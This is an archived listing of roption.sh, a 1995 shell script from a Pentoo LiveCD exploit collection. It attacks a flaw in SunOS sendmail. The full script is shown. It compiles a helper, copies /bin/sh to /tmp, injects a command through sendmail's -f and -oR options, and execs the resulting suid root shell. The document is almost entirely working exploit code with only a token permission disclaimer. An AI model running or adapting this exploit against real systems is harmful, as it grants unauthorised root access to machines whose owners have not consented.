home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
mail
/
sendmail
/
roption.sh
< prev
next >
Wrap
Linux/UNIX/POSIX Shell Script
|
2005-02-12
|
2KB
|
75 lines
#!/bin/sh
#
# Syntax: roption host
#
# host is any system running sendmail (except localhost).
#
# This exploits a flaw in SunOS sendmail(8), and attempts
# create a suid root shell
#
# Written 1995 by [8LGM]
# Please do not use this script without permission.
#
#
#
#**************************************************************************
# HACK: Sendmail(8): Create suid root shells [8lgm]
# System: SunOS
# Source: [8lgm] at webserv@FOUR.net
# Date: Aug 24,1995
#**************************************************************************
#
PROG="`basename $0`"
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
# Check args
if [ $# -ne 1 ]; then
echo "Syntax: $PROG host"
exit 1
fi
# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
echo "Sorry, this only works on SunOS"
exit 1
fi
PROG="`basename $0`"
EXECME=/tmp/HotterThanMojaveInMyHeart
# Create EXECME.c
cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
chown("/tmp/InfamousAngel", 0, 0);
chmod("/tmp/InfamousAngel", 04755);
}
EOF
cc -o $EXECME $EXECME.c
# Check we have EXECME
if [ ! -x $EXECME ]; then
echo "$PROG: couldnt compile $EXECME.c - check it out"
exit 1
fi
/bin/cp /bin/sh /tmp/InfamousAngel
# Run sendmail
/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular
Hows it goin
EOF
exec /tmp/InfamousAngel
